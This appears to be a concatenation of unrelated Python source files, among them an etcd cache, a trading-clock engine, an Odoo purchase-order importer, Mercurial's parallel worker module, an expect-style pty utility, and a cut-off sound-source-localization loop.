self._oneRunFinished = Event()
self._finishIndicator = False
self._callable = target
self._callableArgs = args or ()
self._callableKwargs = kwargs or {}
Thread.__init__(self)
def restart(self) -> None:
"""
make sure to always call join() before restarting
"""
self._startSignal.set()
def run(self) -> None:
"""
This class will reprocess the object "processObject" forever.
Through the change of data inside processObject and start signals
we can reuse the thread's resources
"""
self.restart()
while True:
# wait until we should process
self._startSignal.wait()
self._startSignal.clear()
if self._finishIndicator: # check, if we want to stop
self._oneRunFinished.set()
return
# call the threaded function
self._callable(*self._callableArgs, **self._callableKwargs)
# notify about the run's end
self._oneRunFinished.set()
def join(self, timeout: float = None) -> None:
"""
This join will only wait for one single run (target functioncall) to be finished
"""
self._oneRunFinished.wait(timeout)
self._oneRunFinished.clear()
self.restart()
def finish(self) -> None:
self._finishIndicator = True
self.restart()
self.join(5)
class EtcdCache:
_callbacks: List[Callback]
_data: QueryDict
_etcd_client: etcd.Client
_etcd_updater: ReusableThread
_root: str
_timeout: int
def __init__(self, host: str, port: int, base: str, timeout: int = 60, callbacks: Callbacks = None):
super().__init__()
self._callbacks = []
if isinstance(callbacks, (list, tuple)):
self._callbacks.extend([f for f in callbacks if isFunction(f)])
self._data = QueryDict()
self._etcd_client = etcd.Client(
host=host,
port=port
)
self._root = base if base.endswith('/') else f'{base}/'
self._timeout = timeout
self._initial()
self._etcd_updater = ReusableThread(target=self._update, kwargs={'wait': True})
self._etcd_updater.setDaemon(True)
self._etcd_updater.start()
@property
def cache(self) -> FrozenDict:
return FrozenDict(self._data)
def shutdown(self) -> None:
self._etcd_updater.join(5)
self._etcd_updater.finish()
# Helper Methods
def _initial(self, base: str = None) -> None:
"""
Get ETCD initial values
"""
root = base or self._root
try:
for k in self._etcd_client.read(root, recursive=True, sorted=True).children:
key = k.key.replace(self._root, '').replace('/', '.')
self._data[key] = k.value
except (etcd.EtcdKeyNotFound, etcd.EtcdWatchTimedOut):
pass
def _update(self, wait: bool = False, base: str = None) -> None:
"""
Get ETCD value updates
"""
root = base or self._root
kwargs = dict(wait=True, timeout=self._timeout) if wait else {}
update = False
try:
for k in self._etcd_client.read(root, recursive=True, sorted=True, **kwargs).children:
update = True
key = k.key.replace(self._root, '').replace('/', '.')
t_id = key.split('.')[0]
if t_id not in self._data:
sleep(0.5)
self._initial(base=f'{root}{t_id}')
else:
if k.value is None:
del self._data[key]
else:
self._data[key] = k.value
update = True
except (etcd.EtcdKeyNotFound, etcd.EtcdWatchTimedOut):
pass
if update:
for func in self._callbacks:
func(self.cache)
if self._etcd_updater.is_alive():
self._etcd_updater.join(5)
self._etcd_updater.restart()
else:
self._etcd_updater.start()
|
clock_engine.py
|
# coding: utf-8
import datetime
from collections import deque
from threading import Thread
import pandas as pd
import arrow
from dateutil import tz
import time
from ..easydealutils import time as etime
from ..event_engine import Event
class Clock:
def __init__(self, trading_time, clock_event):
self.trading_state = trading_time
self.clock_event = clock_event
class ClockIntervalHandler:
def __init__(self, clock_engine, interval, trading=True, call=None):
"""
:param interval: float(minute)
:param trading: 在交易阶段才触发
:return:
"""
self.clock_engine = clock_engine
self.clock_type = interval
self.interval = interval
self.second = int(interval * 60)
self.trading = trading
self.call = call or (lambda: None)
def is_active(self):
if self.trading:
if not self.clock_engine.trading_state:
return False
return int(self.clock_engine.now) % self.second == 0
def __eq__(self, other):
if isinstance(other, ClockIntervalHandler):
return self.interval == other.interval
else:
return False
def __hash__(self):
return self.second
class ClockMomentHandler:
def __init__(self, clock_engine, clock_type, moment=None, is_trading_date=True, makeup=False, call=None):
"""
:param clock_type:
:param moment: datetime.time
:param is_trading_date: bool(是否只有在交易日触发)
:param makeup: 注册时,如果已经过了触发时机,是否立即触发
:return:
"""
self.clock_engine = clock_engine
self.clock_type = clock_type
self.moment = moment
self.is_trading_date = is_trading_date
self.makeup = makeup
self.call = call or (lambda: None)
self.next_time = datetime.datetime.combine(
self.clock_engine.now_dt.date(),
self.moment,
)
if not self.makeup and self.is_active():
self.update_next_time()
def update_next_time(self):
"""
下次激活时间
:return:
"""
if self.is_active():
if self.is_trading_date:
next_date = etime.get_next_trade_date(self.clock_engine.now_dt)
else:
next_date = self.next_time.date() + datetime.timedelta(days=1)
self.next_time = datetime.datetime.combine(
next_date,
self.moment
)
def is_active(self):
if self.is_trading_date and not etime.is_trade_date(self.clock_engine.now_dt):
# 仅在交易日触发时的判断
return False
return self.next_time <= self.clock_engine.now_dt
class ClockEngine:
"""
时间推送引擎
1. 提供统一的 now 时间戳.
"""
EventType = 'clock_tick'
def __init__(self, event_engine, tzinfo=None):
"""
:param event_engine:
:param event_engine: tzinfo
:return:
"""
# 默认使用当地时间的时区
self.tzinfo = tzinfo or tz.tzlocal()
self.event_engine = event_engine
self.is_active = True
self.clock_engine_thread = Thread(target=self.clocktick, name="ClockEngine.clocktick")
self.sleep_time = 1
self.trading_state = True if (etime.is_tradetime(datetime.datetime.now()) and etime.is_trade_date(datetime.datetime.now())) else False
self.clock_moment_handlers = deque()
self.clock_interval_handlers = set()
self._init_clock_handler()
def _init_clock_handler(self):
"""
注册默认的时钟事件
:return:
"""
# 开盘事件
def _open():
self.trading_state = True
self._register_moment('open', datetime.time(9, tzinfo=self.tzinfo), makeup=True, call=_open)
# 中午休市
self._register_moment('pause', datetime.time(11, 30, tzinfo=self.tzinfo), makeup=True)
# 下午开盘
self._register_moment('continue', datetime.time(13, tzinfo=self.tzinfo), makeup=True)
# 收盘事件
def close():
self.trading_state = False
self._register_moment('close', datetime.time(15, tzinfo=self.tzinfo), makeup=True, call=close)
# 间隔事件
for interval in (0.5, 1, 5, 15, 30, 60):
self.register_interval(interval)
@property
def now(self):
"""
now 时间戳统一接口
:return:
"""
return time.time()
@property
def now_dt(self):
"""
:return: datetime 类型, 带时区的时间戳.建议使用 arrow 库
"""
return arrow.get(self.now).to(self.tzinfo)
def start(self):
self.clock_engine_thread.start()
def clocktick(self):
while self.is_active:
self.tock()
time.sleep(self.sleep_time)
def tock(self):
if not etime.is_trade_date(self.now_dt):
pass # 假日暂停时钟引擎
else:
self._tock()
def _tock(self):
# 间隔事件
for handler in self.clock_interval_handlers:
if handler.is_active():
handler.call()
self.push_event_type(handler)
# 时刻事件
while self.clock_moment_handlers:
clock_handler = self.clock_moment_handlers.pop()
if clock_handler.is_active():
clock_handler.call()
self.push_event_type(clock_handler)
clock_handler.update_next_time()
self.clock_moment_handlers.appendleft(clock_handler)
else:
self.clock_moment_handlers.append(clock_handler)
break
def push_event_type(self, clock_handler):
event = Event(event_type=self.EventType, data=Clock(self.trading_state, clock_handler.clock_type))
self.event_engine.put(event)
def stop(self):
self.is_active = False
def is_tradetime_now(self):
"""
:return:
"""
return etime.is_tradetime(self.now_dt)
def register_moment(self, clock_type, moment, makeup=False):
return self._register_moment(clock_type, moment, makeup=makeup)
def _register_moment(self, clock_type, moment, is_trading_date=True, makeup=False, call=None):
handlers = list(self.clock_moment_handlers)
handler = ClockMomentHandler(self, clock_type, moment, is_trading_date, makeup, call)
handlers.append(handler)
# 触发事件重新排序
handlers.sort(key=lambda h: h.next_time, reverse=True)
self.clock_moment_handlers = deque(handlers)
return handler
def register_interval(self, interval_minute, trading=True):
return self._register_interval(interval_minute, trading)
def _register_interval(self, interval_minute, trading=True, call=None):
handler = ClockIntervalHandler(self, interval_minute, trading, call)
self.clock_interval_handlers.add(handler)
return handler
|
main.py
|
"""
This is the main file that runs the OpenEEW code package
"""
# import modules
import time
from threading import Thread
import os
from params import params
from src import data_holders, receive_traces, aws
__author__ = "Vaclav Kuna"
__copyright__ = ""
__license__ = ""
__version__ = "1.0"
__maintainer__ = "Vaclav Kuna"
__email__ = "kuna.vaclav@gmail.com"
__status__ = ""
def main():
"""Does everything"""
# Create a dictionary of aws credentials from enviroment variables
aws_cred = {
"AWS_REGION": os.environ["AWS_REGION"],
"ACCESS_KEY_ID": os.environ["ACCESS_KEY_ID"],
"SECRET_ACCESS_KEY": os.environ["SECRET_ACCESS_KEY"],
"BUCKET_NAME": os.environ["BUCKET_NAME"],
}
# Create a RawData DataFrame.
traces = data_holders.Traces()
# We create and start our traces update worker
stream = receive_traces.DataReceiver(traces)
receive_data_process = Thread(target=stream.run)
receive_data_process.start()
# We create and start detection worker
compute = aws.AWSdump(traces=traces, params=params, aws_cred=aws_cred)
aws_process = Thread(target=compute.run)
aws_process.start()
# We join our Threads, i.e. we wait for them to finish before continuing
receive_data_process.join()
aws_process.join()
if __name__ == "__main__":
main()
|
50_po_history.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import csv
from xmlrpc import client as xmlrpclib
import multiprocessing as mp
from scriptconfig import URL, DB, UID, PSW, WORKERS
# ==================================== Purchase ORDER ====================================
def update_purchase_order(pid, data_pool, error_ids, write_ids, partner_ids, term_ids):
sock = xmlrpclib.ServerProxy(URL, allow_none=True)
while data_pool:
try:
data = data_pool.pop()
order_no = data.get('ORDR-NUM', '')
partner_id = partner_ids.get(data.get('VEND-CODE', '').strip())
term_id = term_ids.get(data.get('TERM-CODE', '').strip())
if not partner_id or not term_id:
error_ids.append(order_no)
continue
vals={'name': data.get('ORDR-NUM', '').strip(),
'partner_id': partner_id,
'date_order': data.get('ORDR-DATE').strip(),
'release_date': data.get('ORDR-RELEASE-DATE').strip(),
'payment_term_id': term_id,
# 'state': 'purchase'
}
res = write_ids.get(order_no, [])
if res:
sock.execute(DB, UID, PSW, 'purchase.order', 'write', res, vals)
print(pid, 'UPDATE - SALE ORDER', res)
else:
res = sock.execute(DB, UID, PSW, 'purchase.order', 'create', vals)
print(pid, 'CREATE - PURCHASE ORDER', res, order_no)
if not data_pool:
break
except Exception as e:
print(e)
break
def sync_purchase_orders():
manager = mp.Manager()
data_pool = manager.list()
error_ids = manager.list()
write_ids = manager.dict()
process_Q = []
fp = open('files/polhist1.csv', 'r')
csv_reader = csv.DictReader(fp)
for vals in csv_reader:
data_pool.append(vals)
fp.close()
sock = xmlrpclib.ServerProxy(URL, allow_none=True)
res = sock.execute(DB, UID, PSW, 'res.partner', 'search_read', ['|', ('active', '=', False), ('active', '=', True)], ['customer_code'])
vendor = {rec['customer_code']: rec['id'] for rec in res}
partner_ids = manager.dict(vendor)
res = sock.execute(DB, UID, PSW, 'purchase.order', 'search_read', [], ['name'])
write_ids = {rec['name']: rec['id'] for rec in res}
payment_terms = sock.execute(DB, UID, PSW, 'account.payment.term', 'search_read', [('order_type','=','purchase')], ['id','code'])
term_ids = {term['code']: term['id'] for term in payment_terms}
orders = None
vendor = None
res = None
payment_terms = None
for i in range(WORKERS):
pid = "Worker-%d" % (i + 1)
worker = mp.Process(name=pid, target=update_purchase_order, args=(pid, data_pool, error_ids, write_ids, partner_ids, term_ids))
process_Q.append(worker)
worker.start()
for worker in process_Q:
worker.join()
if __name__ == "__main__":
sync_purchase_orders()
|
worker.py
|
# worker.py - master-slave parallelism support
#
# Copyright 2013 Facebook, Inc.
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
from __future__ import absolute_import
import errno
import os
import signal
import sys
import threading
from .i18n import _
from . import error
def countcpus():
'''try to count the number of CPUs on the system'''
# posix
try:
n = int(os.sysconf('SC_NPROCESSORS_ONLN'))
if n > 0:
return n
except (AttributeError, ValueError):
pass
# windows
try:
n = int(os.environ['NUMBER_OF_PROCESSORS'])
if n > 0:
return n
except (KeyError, ValueError):
pass
return 1
def _numworkers(ui):
s = ui.config('worker', 'numcpus')
if s:
try:
n = int(s)
if n >= 1:
return n
except ValueError:
raise error.Abort(_('number of cpus must be an integer'))
return min(max(countcpus(), 4), 32)
if os.name == 'posix':
_startupcost = 0.01
else:
_startupcost = 1e30
def worthwhile(ui, costperop, nops):
'''try to determine whether the benefit of multiple processes can
outweigh the cost of starting them'''
linear = costperop * nops
workers = _numworkers(ui)
benefit = linear - (_startupcost * workers + linear / workers)
return benefit >= 0.15
def worker(ui, costperarg, func, staticargs, args):
'''run a function, possibly in parallel in multiple worker
processes.
returns a progress iterator
costperarg - cost of a single task
func - function to run
staticargs - arguments to pass to every invocation of the function
args - arguments to split into chunks, to pass to individual
workers
'''
if worthwhile(ui, costperarg, len(args)):
return _platformworker(ui, func, staticargs, args)
return func(*staticargs + (args,))
def _posixworker(ui, func, staticargs, args):
rfd, wfd = os.pipe()
workers = _numworkers(ui)
oldhandler = signal.getsignal(signal.SIGINT)
signal.signal(signal.SIGINT, signal.SIG_IGN)
pids, problem = [], [0]
for pargs in partition(args, workers):
pid = os.fork()
if pid == 0:
signal.signal(signal.SIGINT, oldhandler)
try:
os.close(rfd)
for i, item in func(*(staticargs + (pargs,))):
os.write(wfd, '%d %s\n' % (i, item))
os._exit(0)
except KeyboardInterrupt:
os._exit(255)
# other exceptions are allowed to propagate, we rely
# on lock.py's pid checks to avoid release callbacks
pids.append(pid)
pids.reverse()
os.close(wfd)
fp = os.fdopen(rfd, 'rb', 0)
def killworkers():
# if one worker bails, there's no good reason to wait for the rest
for p in pids:
try:
os.kill(p, signal.SIGTERM)
except OSError as err:
if err.errno != errno.ESRCH:
raise
def waitforworkers():
for _pid in pids:
st = _exitstatus(os.wait()[1])
if st and not problem[0]:
problem[0] = st
killworkers()
t = threading.Thread(target=waitforworkers)
t.start()
def cleanup():
signal.signal(signal.SIGINT, oldhandler)
t.join()
status = problem[0]
if status:
if status < 0:
os.kill(os.getpid(), -status)
sys.exit(status)
try:
for line in fp:
l = line.split(' ', 1)
yield int(l[0]), l[1][:-1]
except: # re-raises
killworkers()
cleanup()
raise
cleanup()
def _posixexitstatus(code):
'''convert a posix exit status into the same form returned by
os.spawnv
returns None if the process was stopped instead of exiting'''
if os.WIFEXITED(code):
return os.WEXITSTATUS(code)
elif os.WIFSIGNALED(code):
return -os.WTERMSIG(code)
if os.name != 'nt':
_platformworker = _posixworker
_exitstatus = _posixexitstatus
def partition(lst, nslices):
'''partition a list into N slices of roughly equal size
The current strategy takes every Nth element from the input. If
we ever write workers that need to preserve grouping in input
we should consider allowing callers to specify a partition strategy.
mpm is not a fan of this partitioning strategy when files are involved.
In his words:
Single-threaded Mercurial makes a point of creating and visiting
files in a fixed order (alphabetical). When creating files in order,
a typical filesystem is likely to allocate them on nearby regions on
disk. Thus, when revisiting in the same order, locality is maximized
and various forms of OS and disk-level caching and read-ahead get a
chance to work.
This effect can be quite significant on spinning disks. I discovered it
circa Mercurial v0.4 when revlogs were named by hashes of filenames.
Tarring a repo and copying it to another disk effectively randomized
the revlog ordering on disk by sorting the revlogs by hash and suddenly
performance of my kernel checkout benchmark dropped by ~10x because the
"working set" of sectors visited no longer fit in the drive's cache and
the workload switched from streaming to random I/O.
What we should really be doing is have workers read filenames from a
ordered queue. This preserves locality and also keeps any worker from
getting more than one file out of balance.
'''
for i in range(nslices):
yield lst[i::nslices]
|
uexpect.py
|
# Copyright (c) 2019 Vitaliy Zakaznikov
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import pty
import time
import sys
import re
from threading import Thread, Event
from subprocess import Popen
from Queue import Queue, Empty
class TimeoutError(Exception):
def __init__(self, timeout):
self.timeout = timeout
def __str__(self):
return 'Timeout %.3fs' % float(self.timeout)
class ExpectTimeoutError(Exception):
def __init__(self, pattern, timeout, buffer):
self.pattern = pattern
self.timeout = timeout
self.buffer = buffer
def __str__(self):
s = 'Timeout %.3fs ' % float(self.timeout)
if self.pattern:
s += 'for %s ' % repr(self.pattern.pattern)
if self.buffer:
s += 'buffer %s' % repr(self.buffer[:])
#s += ' or \'%s\'' % ','.join(['%x' % ord(c) for c in self.buffer[:]])
return s
class IO(object):
class EOF(object):
pass
class Timeout(object):
pass
EOF = EOF
TIMEOUT = Timeout
class Logger(object):
def __init__(self, logger, prefix=''):
self._logger = logger
self._prefix = prefix
def write(self, data):
self._logger.write(('\n' + data).replace('\n','\n' + self._prefix))
def flush(self):
self._logger.flush()
def __init__(self, process, master, queue, reader):
self.process = process
self.master = master
self.queue = queue
self.buffer = None
self.before = None
self.after = None
self.match = None
self.pattern = None
self.reader = reader
self._timeout = None
self._logger = None
self._eol = ''
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.close()
def logger(self, logger=None, prefix=''):
if logger:
self._logger = self.Logger(logger, prefix=prefix)
return self._logger
def timeout(self, timeout=None):
if timeout:
self._timeout = timeout
return self._timeout
def eol(self, eol=None):
if eol:
self._eol = eol
return self._eol
def close(self, force=True):
self.reader['kill_event'].set()
os.system('pkill -TERM -P %d' % self.process.pid)
if force:
self.process.kill()
else:
self.process.terminate()
os.close(self.master)
if self._logger:
self._logger.write('\n')
self._logger.flush()
def send(self, data, eol=None):
if eol is None:
eol = self._eol
return self.write(data + eol)
def write(self, data):
return os.write(self.master, data)
def expect(self, pattern, timeout=None, escape=False):
self.match = None
self.before = None
self.after = None
if escape:
pattern = re.escape(pattern)
pattern = re.compile(pattern)
if timeout is None:
timeout = self._timeout
timeleft = timeout
while True:
start_time = time.time()
if self.buffer is not None:
self.match = pattern.search(self.buffer, 0)
if self.match is not None:
self.after = self.buffer[self.match.start():self.match.end()]
self.before = self.buffer[:self.match.start()]
self.buffer = self.buffer[self.match.end():]
break
if timeleft < 0:
break
try:
data = self.read(timeout=timeleft, raise_exception=True)
except TimeoutError:
if self._logger:
self._logger.write((self.buffer or '') + '\n')
self._logger.flush()
exception = ExpectTimeoutError(pattern, timeout, self.buffer)
self.buffer = None
raise exception
timeleft -= (time.time() - start_time)
if data:
self.buffer = (self.buffer + data) if self.buffer else data
if self._logger:
self._logger.write((self.before or '') + (self.after or ''))
self._logger.flush()
if self.match is None:
exception = ExpectTimeoutError(pattern, timeout, self.buffer)
self.buffer = None
raise exception
return self.match
def read(self, timeout=0, raise_exception=False):
data = ''
timeleft = timeout
try:
while timeleft >= 0 :
start_time = time.time()
data += self.queue.get(timeout=timeleft)
if data:
break
timeleft -= (time.time() - start_time)
except Empty:
if data:
return data
if raise_exception:
raise TimeoutError(timeout)
pass
if not data and raise_exception:
raise TimeoutError(timeout)
return data
def spawn(command):
master, slave = pty.openpty()
process = Popen(command, preexec_fn=os.setsid, stdout=slave, stdin=slave, stderr=slave, bufsize=1)
os.close(slave)
queue = Queue()
reader_kill_event = Event()
thread = Thread(target=reader, args=(process, master, queue, reader_kill_event))
thread.daemon = True
thread.start()
return IO(process, master, queue, reader={'thread':thread, 'kill_event':reader_kill_event})
def reader(process, out, queue, kill_event):
while True:
try:
data = os.read(out, 65536)
queue.put(data)
except:
if kill_event.is_set():
break
raise
|
ssl_loop_ac.py
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
"""
loop thread to run ssl
"""
from scipy import stats
import numpy as np
from pyaudio import PyAudio, paInt16
from SoundSourceLocalization.ssl_setup import *
from SoundSourceLocalization.ssl_gcc_generator import GccGenerator
# from SoundSourceLocalization.ssl_actor_critic import Actor, Critic
from SoundSourceLocalization.ssl_map import Map
from SoundSourceLocalization.ssl_audio_processor import *
from SoundSourceLocalization.ssl_turning import SSLturning
from SoundSourceLocalization.kws_detector import KwsDetector
import time
import sys
import os
import threading
import random
from lib.utils import standard_normalizaion, add_prefix_and_suffix_4_basename
from lib.audiolib import normalize_single_channel_to_target_level, audio_segmenter_4_numpy, \
audio_energy_ratio_over_threshold, audio_energy_over_threshold, audiowrite, audioread
import ns_enhance_onnx
from SoundSourceLocalization.ssl_DOA_model import DOA
from ssl_actor_critic import ActorCriticNetwork
pwd = os.path.abspath(os.path.abspath(__file__))
father_path = os.path.abspath(os.path.dirname(pwd) + os.path.sep + "..")
sys.path.append(father_path)
import Driver.ControlOdometryDriver as CD
class SSL:
def __init__(self, denoise=True, seg_len='256ms', debug=False):
print('-' * 20 + 'init SSL class' + '-' * 20)
# self.KWS = KwsDetector(CHUNK, RECORD_DEVICE_NAME, RECORD_WIDTH, CHANNELS,
# SAMPLE_RATE, FORMAT, KWS_WAVE_PATH, KWS_MODEL_PATH, KWS_LABEL_PATH)
self.micro_mapping = np.array(range(CHANNELS), dtype=np.int)
self.denoise = denoise
self.device_index = self.__get_device_index__()
self.frames = []
segment_para_set = {
'32ms' : {
'name' : '32ms',
'time_len' : 32 / 1000,
'threshold' : 100,
'overlap_per': 0.5
},
'50ms' : {
'name' : '50ms',
'time_len' : 50 / 1000,
'threshold' : 100,
'overlap_per': 0.5
},
'64ms' : {
'name' : '64ms',
'time_len' : 64 / 1000,
'threshold' : 100,
'overlap_per': 0.5
},
'128ms': {
'name' : '128ms',
'time_len' : 128 / 1000,
'threshold' : 200, # 100?
'overlap_per': 0.5
},
'256ms': {
'name' : '256ms',
'time_len' : 256 / 1000,
'threshold' : 400,
'overlap_per': 0.67
},
'1s' : {
'name' : '1s',
'time_len' : 1024 / 1000,
'threshold' : 800,
'overlap_per': 0.9
},
}
self.seg_para = segment_para_set[seg_len]
self.debug = debug
self.save_dir_name = ''
ref_audio, _ = audioread('../resource/wav/reference_wav.wav')
self.ref_audio = normalize_single_channel_to_target_level(ref_audio)
self.ref_audio_threshold = (self.ref_audio ** 2).sum() / len(self.ref_audio) / 500
print('Loading denoising model...\n')
self.denoise_model, _ = ns_enhance_onnx.load_onnx_model()
print('Loading DOA model...\n')
self.doa = DOA(model_dir=os.path.abspath('./model/EEGNet/ckpt'))
self.ac = ActorCriticNetwork(n_actions=ACTION_SPACE, name='actor_critic', ini_model=self.doa.model,
ini_model_dir='./model/EEGNet/ckpt',
save_model_dir='./model/actor_critic_model/ckpt')
def __get_device_index__(self):
device_index = -1
# scan to get usb device
p = PyAudio()
print('num_device:', p.get_device_count())
for index in range(p.get_device_count()):
info = p.get_device_info_by_index(index)
device_name = info.get("name")
print("device_name: ", device_name)
# find mic usb device
if device_name.find(RECORD_DEVICE_NAME) != -1:
device_index = index
break
if device_index != -1:
print('-' * 20 + 'Find the device' + '-' * 20 + '\n', p.get_device_info_by_index(device_index), '\n')
del p
else:
print('-' * 20 + 'Cannot find the device' + '-' * 20 + '\n')
exit()
return device_index
def savewav_from_frames(self, filename, frames=None):
if frames is None:
frames = self.frames
wf = wave.open(filename, 'wb')
wf.setnchannels(CHANNELS)
wf.setsampwidth(RECORD_WIDTH)
wf.setframerate(SAMPLE_RATE)
wf.writeframes(b''.join(frames))
wf.close()
def save_multi_channel_audio(self, des_dir, audio, fs=SAMPLE_RATE, norm=True, ):
for i in range(len(audio)):
file_path = os.path.join(des_dir, 'test_mic%d.wav' % i)
audiowrite(file_path, audio[i], sample_rate=fs, norm=norm, target_level=-25, clipping_threshold=0.99)
def read_multi_channel_audio(self, dir_path, num_channel=CHANNELS):
audio = []
for i in range(num_channel):
file_path = os.path.join(dir_path, 'test_mic%d.wav' % i)
audio_i, _ = audioread(file_path, )
audio.append(audio_i)
return np.array(audio)
def read_and_split_channels_from_file(self, filepath):
f = wave.open(filepath)
params = f.getparams()
num_channel, sample_width, fs, num_frame = params[:4]
str_data = f.readframes(num_frame)
f.close()
audio = np.frombuffer(str_data, dtype=np.short)
audio = np.reshape(audio, (-1, 4)).T
return audio
def split_channels_from_frames(self, frames=None, num_channel=CHANNELS, mapping_flag=True):
if frames is None:
frames = self.frames
audio = np.frombuffer(b''.join(frames), dtype=np.short)
audio = np.reshape(audio, (-1, num_channel)).T
if mapping_flag:
audio = audio[self.micro_mapping]
return audio
def monitor_from_4mics(self, record_seconds=RECORD_SECONDS):
# print('-' * 20 + "start monitoring ...")
p = PyAudio()
stream = p.open(format=p.get_format_from_width(RECORD_WIDTH),
channels=CHANNELS,
rate=SAMPLE_RATE,
input=True,
input_device_index=self.device_index)
# 16 data
frames = []
for i in range(int(SAMPLE_RATE / CHUNK * record_seconds)):
data = stream.read(CHUNK)
frames.append(data)
stream.stop_stream()
stream.close()
p.terminate()
# print('-' * 20 + "End monitoring ...\n")
return frames
def monitor_audio_and_return_amplitude_ratio(self, mapping_flag):
frames = self.monitor_from_4mics(record_seconds=1)
audio = self.split_channels_from_frames(frames=frames, num_channel=CHANNELS, mapping_flag=mapping_flag)
amp2_sum = np.sum(standard_normalizaion(audio) ** 2, axis=1).reshape(-1)
amp2_ratio = amp2_sum / amp2_sum.sum()
return amp2_ratio
def init_micro_mapping(self, ):
print('Please tap each microphone clockwise from the upper left corner ~ ')
mapping = [None, ] * 4
while True:
for i in range(CHANNELS):
while True:
ratio = self.monitor_audio_and_return_amplitude_ratio(mapping_flag=False)
idx = np.where(ratio > 0.5)[0]
if len(idx) == 1 and (idx[0] not in mapping):
mapping[i] = idx[0]
print(' '.join(['Logical channel', str(i), 'has been set as physical channel', str(mapping[i]),
'Amplitude**2 ratio: ', str(ratio)]))
break
print('Final mapping: ')
print('Logical channel: ', list(range(CHANNELS)))
print('Physical channel: ', mapping)
break
confirm_info = input('Confirm or Reset the mapping? Press [y]/n :')
if confirm_info in ['y', '', 'yes', 'Yes']:
break
else:
print('The system will reset the mapping')
continue
self.micro_mapping = np.array(mapping)
def save_wav(self, filepath):
wf = wave.open(filepath, 'wb')
wf.setnchannels(1)
wf.setsampwidth(2)
wf.setframerate(self.SAMPLING_RATE)
wf.writeframes(np.array(self.Voice_String).tostring())
# wf.writeframes(self.Voice_String.decode())
wf.close()
def drop_audio_per_seg_point(self, signal_segment, ):
'''
two standards:
1. audio_energy_ratio
2. audio_energy_over_threshold
'''
signal_mean = signal_segment.mean(axis=0)
return not (audio_energy_over_threshold(signal_mean, threshold=self.ref_audio_threshold, ) and
audio_energy_ratio_over_threshold(signal_mean, fs=SAMPLE_RATE,
threshold=self.seg_para['threshold'], ))
def save_continuous_True(self, ini_list, num=3): # todo
pass
def drop_audio_clips(self, signal_segments, ):
# print('Number of segments before dropping: ', len(signal_segments))
audio_segments = []
drop_flag = []
for i in range(len(signal_segments)):
drop_flag.append(self.drop_audio_per_seg_point(signal_segments[i]))
if not drop_flag[-1]:
audio_segments.append(signal_segments[i])
else:
continue
# audio_segments.append([])
# print('Number of segments after dropping: ', len(audio_segments))
return np.array(audio_segments), drop_flag
def concat_ref_audio(self, audios, ref_audio):
res_audio = []
for i in audios:
res_audio.append(np.concatenate((ref_audio, i)))
return np.array(res_audio)
def del_ref_audio(self, audios, ref_audio):
audios = np.array(audios)
length = len(ref_audio)
return audios[:, length:]
def norm_batch_audio_to_target_level(self, audio_batch):
res_audio = []
for audio_channels in audio_batch:
norm_audio_channels = []
for audio in audio_channels:
norm_audio_channels.append(normalize_single_channel_to_target_level(audio))
res_audio.append(norm_audio_channels)
return np.array(res_audio)
def preprocess_ini_signal(self, ini_signals):
# todo how to denoise when nobody is talking
ini_signals = np.array(ini_signals, dtype=np.float64)
norm_signals = self.norm_batch_audio_to_target_level([ini_signals])[0]
# des_dir = os.path.join(WAV_PATH, self.save_dir_name, 'norm_ini_signal')
# self.save_multi_channel_audio(des_dir, norm_signals, fs=SAMPLE_RATE, norm=True, )
# norm_signals = self.concat_ref_audio(norm_signals, self.ref_audio)
# des_dir = os.path.join(WAV_PATH, self.save_dir_name, 'concat_norm_ini_signal')
# self.save_multi_channel_audio(des_dir, norm_signals, fs=SAMPLE_RATE, norm=True, )
denoised_norm_signals = [
ns_enhance_onnx.denoise_nsnet2(audio=signal, fs=SAMPLE_RATE, model=self.denoise_model, )
for signal in norm_signals]
# denoised_norm_dir = os.path.join(WAV_PATH, self.save_dir_name, 'denoised_norm_signal')
# self.save_multi_channel_audio(denoised_norm_dir, denoised_norm_signals, fs=SAMPLE_RATE, norm=False, )
# denoised_norm_signals = self.del_ref_audio(denoised_norm_signals, self.ref_audio)
# denoised_norm_dir = os.path.join(WAV_PATH, self.save_dir_name, 'del_denoised_norm_signal')
# self.save_multi_channel_audio(denoised_norm_dir, denoised_norm_signals, fs=SAMPLE_RATE, norm=False, )
# denoised_norm_dir = os.path.join(WAV_PATH, self.save_dir_name, 'norm_del_denoised_norm_signal')
# self.save_multi_channel_audio(denoised_norm_dir, denoised_norm_signals, fs=SAMPLE_RATE, norm=True, )
seg_denoised_signals = np.array(
[audio_segmenter_4_numpy(signal, segment_len=self.seg_para['time_len'],
overlap_per=self.seg_para['overlap_per'], fs=SAMPLE_RATE, dropout=False, )
for signal in denoised_norm_signals])
seg_denoised_signals = seg_denoised_signals.transpose(1, 0, 2) # deg_idx * channel * samplepoint
audio_segments, drop_flag = self.drop_audio_clips(signal_segments=seg_denoised_signals)
norm_audio_segments = self.norm_batch_audio_to_target_level(audio_segments)
return norm_audio_segments, drop_flag
def loop(self, event, control, source='test'):
# self.init_micro_mapping()
# initialize models
# map = Map()
# gccGenerator = GccGenerator()
# actor = Actor(GCC_BIAS, ACTION_SPACE, lr=0.004)
# critic = Critic(GCC_BIAS, ACTION_SPACE, lr=0.003, gamma=0.95)
# actor.load_trained_model(MODEL_PATH)
# set parameters
# num_saved_sig = 1
# fixme, set start position
# map.walker_pos_x = 1.3
# map.walker_pos_z = 3.3
# map.walker_face_to = 0
# 1.0, 1.85, 0
# -3.1, 0.9, 90
# -2.1, 0.9, 90
# init at the first step
# state_last = None
# action_last = None
# direction_last = None
# steps
while True:
event.wait()
# print('num_saved_sig: ', int(num_saved_sig))
# map.print_walker_status()
# map.detect_which_region()
# final_file = None
# Record
# # todo, congest here for kws
# if num_saved_sig == 0:
# print("congest in KWS ...")
# self.KWS.slide_win_loop()
# wakeup_wav = self.KWS.RANDOM_PREFIX + "win.wav"
#
# denoised_sig_fname = str(num_saved_sig) + "_de.wav"
#
# de_noise(os.path.join(self.KWS.WAV_PATH, wakeup_wav),
